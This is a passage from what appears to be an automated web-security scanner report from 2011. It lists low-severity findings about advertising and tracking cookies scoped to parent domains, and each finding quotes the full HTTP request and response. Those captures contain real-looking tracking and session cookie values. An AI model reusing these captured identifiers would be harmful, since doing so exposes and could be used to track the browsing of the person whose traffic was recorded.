rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.42. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5671&nid=2081&put=OO-00000000000000000&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2081=OO-00000000000000000; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.43. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fe3ac8db403a568 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.44. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2863298321806118365&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2863298321806118365&rnd=9204366597143776733&fpid=6&nu=y&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2863298321806118365; expires=Sun, 06-Nov-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.45. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%264214%3D1; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%264214%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1197=3620501663059719663; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.46. http://pluck.abc.net.au/ver1.0/daapi2.api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3920
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')({
"Envelopes": [
{
"PayloadType": "Responses.Users.UserResponse",
"Payload": {
"User": {
"Age": "",
"Sex": "None",

...[SNIP]...

8.47. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:19:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:19:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:19:04 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.48. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:14:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.49. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 661
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.50. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
